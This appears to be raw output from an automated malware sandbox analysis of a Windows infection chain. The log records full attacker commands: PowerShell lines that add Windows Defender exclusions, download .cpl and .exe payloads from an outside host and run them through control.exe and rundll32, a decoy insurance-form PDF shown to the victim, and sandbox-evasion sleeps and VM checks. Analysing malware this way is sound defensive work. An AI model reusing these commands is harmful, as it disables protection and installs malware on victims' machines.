Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 9072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408	Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976	Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976	Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 824	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\

Source: svchost.exe, 0000000E.00000002.2703735202.000002794C655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2700987159.000002794722B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4.32.dr	Binary or memory string: "VMware V[

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
